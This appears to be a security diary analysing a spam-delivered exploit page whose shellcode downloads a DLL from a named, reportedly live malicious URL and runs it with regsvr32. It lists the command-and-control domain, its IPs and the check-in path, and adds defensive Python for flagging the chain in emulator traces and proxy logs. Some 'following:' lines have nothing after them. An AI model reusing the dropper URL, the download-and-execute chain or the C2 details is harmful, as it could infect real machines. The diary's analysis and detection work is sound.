Last Updated: 2012-03-03 05:02:38 UTC
by Manuel Humberto Santander Pelaez (Version: 1)
Be careful with the links shown in this diary: they are live and could infect your computer if not handled properly.
I received today the following message:
Now here is where the malicious stuff begins. After deobfuscating the script, we find the following:
- The script determines which browser is running on the system:
- It determines which versions of Adobe Flash and Adobe Reader are installed:
- Finally, shellcode is executed:
Let's take a look at the shellcode. It makes the following API calls, in order:
- kernel32.VirtualProtect: This function is called to change the memory-protection attributes of a 255-byte region (typically to make it writable and executable, so the rest of the payload can run from it). For more information about the available attributes, see http://msdn.microsoft.com/en-us/library/windows/desktop/aa366786%28v=vs.85%29.aspx.
- kernel32.LoadLibraryA: This function is called to load urlmon.dll, the library that provides URL download functions over HTTP. The shellcode then calls one of them:
- urlmon.URLDownloadToFileA: This function is called to download http://migdaliasbistro.net/w.php?f=f7d19&e=1 and save it as wpbt0.dll.
- kernel32.WinExec: This function is called to run regsvr32 -s on the downloaded DLL. Registering it this way loads the DLL and calls its DllRegisterServer export, which is how the payload gets executed.
- kernel32.TerminateThread: This function is called to end the shellcode's thread.
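A shellcode emulator (libemu's sctest, for example) will print this API call sequence without the sample ever touching a real Windows host. The following Python script, added here as an example and not part of the original diary, parses such a trace and flags the download-and-execute chain described above: a URLDownloadToFileA call whose dropped filename later shows up in a WinExec/CreateProcess command line, plus any VirtualProtect call that makes a region both writable and executable. The trace format and the sample lines are constructed to mirror the calls listed above; the addresses and handles are made up.

```python
import re
from dataclasses import dataclass

# Constructed sample API-call trace (not real emulator output).  The calls and
# string arguments mirror the chain described in the diary; addresses and
# handles are invented.
SAMPLE_TRACE = """\
kernel32.VirtualProtect(lpAddress=0x0012f8a0, dwSize=255, flNewProtect=0x40, lpflOldProtect=0x0012f89c)
kernel32.LoadLibraryA(lpFileName="urlmon.dll")
urlmon.URLDownloadToFileA(pCaller=0, szURL="http://migdaliasbistro.net/w.php?f=f7d19&e=1", szFileName="wpbt0.dll", dwReserved=0, lpfnCB=0)
kernel32.WinExec(lpCmdLine="regsvr32 -s wpbt0.dll", uCmdShow=0)
kernel32.TerminateThread(hThread=0xfffffffe, dwExitCode=0)
"""

# Constructed contrast case: a download that is never executed (no chain).
BENIGN_TRACE = """\
kernel32.LoadLibraryA(lpFileName="urlmon.dll")
urlmon.URLDownloadToFileA(pCaller=0, szURL="http://www.example.com/update.txt", szFileName="update.txt", dwReserved=0, lpfnCB=0)
"""

PAGE_EXECUTE_READWRITE = 0x40   # flNewProtect value: region becomes writable AND executable

CALL_RE = re.compile(r'^\s*(?P<dll>\w+)\.(?P<func>\w+)\((?P<args>.*)\)\s*$')
ARG_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|[^,]+)')   # name=value, value quoted or bare


@dataclass
class Call:
    dll: str
    func: str
    args: dict


def parse_trace(text):
    """Turn 'dll.Func(a=1, b="x")' lines into Call objects; other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if not m:
            continue
        args = {}
        for name, raw in ARG_RE.findall(m.group('args')):
            raw = raw.strip()
            args[name] = raw[1:-1] if raw.startswith('"') else int(raw, 0)
        calls.append(Call(m.group('dll').lower(), m.group('func'), args))
    return calls


def rwx_regions(calls):
    """(address, size) of every region VirtualProtect made writable+executable."""
    return [(c.args['lpAddress'], c.args['dwSize']) for c in calls
            if c.func == 'VirtualProtect'
            and c.args.get('flNewProtect') == PAGE_EXECUTE_READWRITE]


def find_download_and_execute(calls):
    """Return indicators of a download-then-execute chain, or None if absent.

    Order matters: the execution call must come after the download and must
    reference the dropped filename, so an unrelated WinExec is not flagged.
    """
    dropped = {}   # lowercase dropped filename -> source URL
    for c in calls:
        if c.func in ('URLDownloadToFileA', 'URLDownloadToFileW'):
            dropped[c.args['szFileName'].lower()] = c.args['szURL']
        elif c.func in ('WinExec', 'CreateProcessA', 'CreateProcessW', 'ShellExecuteA'):
            cmd = c.args.get('lpCmdLine') or c.args.get('lpCommandLine') or ''
            for fname, url in dropped.items():
                if fname in cmd.lower():
                    return {'url': url, 'dropped_file': fname, 'command': cmd,
                            'via_regsvr32': 'regsvr32' in cmd.lower()}
    return None


if __name__ == '__main__':
    calls = parse_trace(SAMPLE_TRACE)
    print('RWX regions:', [(hex(a), n) for a, n in rwx_regions(calls)])
    print('download-and-execute:', find_download_and_execute(calls))
    print('benign trace:', find_download_and_execute(parse_trace(BENIGN_TRACE)))
```

The extracted URL and dropped filename are the indicators to feed into proxy and endpoint searches; the regsvr32 flag is worth surfacing separately, since regsvr32 -s on a file that was just downloaded is a strong signal on its own.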
The file downloaded in step 3 is a DLL with MD5 c3124a2981d8e1b9e13e8c21c96448f7; VirusTotal shows a 7/43 detection ratio. It injects into explorer.exe and places inline hooks in ntdll.dll. Once installed, it reports to hbirjhcnsuiwgtrq.ru, which resolves to the following IP addresses: 126.96.36.199, 188.8.131.52, 184.108.40.206, 220.127.116.11, 18.104.22.168, 22.214.171.124, using an HTTP POST to /rwx/B2_9w3/in/.
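On the network side, the download URL, the C2 domain, the IP addresses it resolved to and the POST path above are what to hunt for in proxy logs to find hosts that have already been hit. The following Python example, added here and not part of the original diary, scans Squid-style native access.log lines for them and reports which clients matched and why. The log lines are constructed; the indicator values come from the diary, while the assumption that the middle path segment of the check-in URL may vary between campaigns is mine.

```python
import re
from urllib.parse import urlsplit

# Indicators from the diary: dropper host, C2 domain, the IPs it resolved to
# at the time of writing, and the check-in path.
PAYLOAD_HOSTS = {"migdaliasbistro.net"}
C2_DOMAINS = {"hbirjhcnsuiwgtrq.ru"}
C2_IPS = {"126.96.36.199", "188.8.131.52", "184.108.40.206",
          "220.127.116.11", "18.104.22.168", "22.214.171.124"}
# Assumption (not from the diary): the middle segment may vary per campaign,
# so match the /rwx/<anything>/in/ shape rather than the literal string.
C2_PATH_RE = re.compile(r"^/rwx/[^/]+/in/?$")

# Constructed Squid native access.log lines (not real traffic).  Fields:
# time elapsed client action/status bytes method url user hierarchy/peer type
SAMPLE_LOG = """\
1330750900.101   120 10.0.0.15 TCP_MISS/200 1834 GET http://www.example.com/index.html - HIER_DIRECT/93.184.216.34 text/html
1330750930.412   388 10.0.0.15 TCP_MISS/200 9216 GET http://migdaliasbistro.net/w.php?f=f7d19&e=1 - HIER_DIRECT/203.0.113.9 application/octet-stream
1330750958.123   245 10.0.0.15 TCP_MISS/200 512 POST http://hbirjhcnsuiwgtrq.ru/rwx/B2_9w3/in/ - HIER_DIRECT/126.96.36.199 text/html
1330751020.777   201 10.0.0.22 TCP_MISS/200 512 POST http://184.108.40.206/rwx/B2_9w3/in/ - HIER_DIRECT/184.108.40.206 text/html
1330751055.005    90 10.0.0.31 TCP_MISS/200 2048 POST http://www.example.com/api/in/ - HIER_DIRECT/93.184.216.34 text/html
"""

FIELDS = ("time", "elapsed", "client", "result", "bytes",
          "method", "url", "user", "hier", "ctype")


def parse_squid_line(line):
    """Split one native-format line into a dict; return None for malformed lines."""
    parts = line.split()
    if len(parts) != len(FIELDS):
        return None
    rec = dict(zip(FIELDS, parts))
    u = urlsplit(rec["url"])
    rec["host"] = u.hostname or ""          # domain or literal IP from the URL
    rec["path"] = u.path
    rec["peer"] = rec["hier"].split("/", 1)[-1]   # "HIER_DIRECT/1.2.3.4" -> "1.2.3.4"
    return rec


def classify(rec):
    """List the reasons a request matches the diary's indicators (empty if none)."""
    reasons = []
    if rec["host"] in PAYLOAD_HOSTS and rec["path"] == "/w.php":
        reasons.append("payload download (w.php on known dropper host)")
    if rec["host"] in C2_DOMAINS or rec["host"] in C2_IPS or rec["peer"] in C2_IPS:
        reasons.append("known C2 host/IP")
    if rec["method"] == "POST" and C2_PATH_RE.match(rec["path"]):
        reasons.append("C2 check-in path")
    return reasons


def scan(log_text):
    """Return one hit per matching request: time, client, URL and reasons."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_squid_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            hits.append({"time": rec["time"], "client": rec["client"],
                         "url": rec["url"], "reasons": reasons})
    return hits


def infected_clients(log_text):
    """Sorted list of client IPs with at least one hit."""
    return sorted({h["client"] for h in scan(log_text)})


if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(h["time"], h["client"], h["url"], "->", "; ".join(h["reasons"]))
    print("clients to isolate:", infected_clients(SAMPLE_LOG))
```

Matching on the destination IP in the hierarchy field as well as on the URL host catches the case where the malware is later pointed straight at one of the C2 addresses; matching the POST path independently of the host catches a domain change, which is the first thing the operators are likely to rotate.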
Such threats are increasing, and controlling them requires malware control measures that are established as part of the company's Information Security Architecture, such as the following:
- Host IPS: Antimalware alone is no longer enough; threats evolve faster than antivirus vendors can produce signatures for every emerging attack in real time. A host IPS instead blocks the exploitation techniques themselves on the endpoint, such as buffer overflows and code injection, so the computer stays protected until the signature is released and the antimalware product can deal with the threat.
- Antimalware: This is the conventional antimalware control sold by the antivirus companies.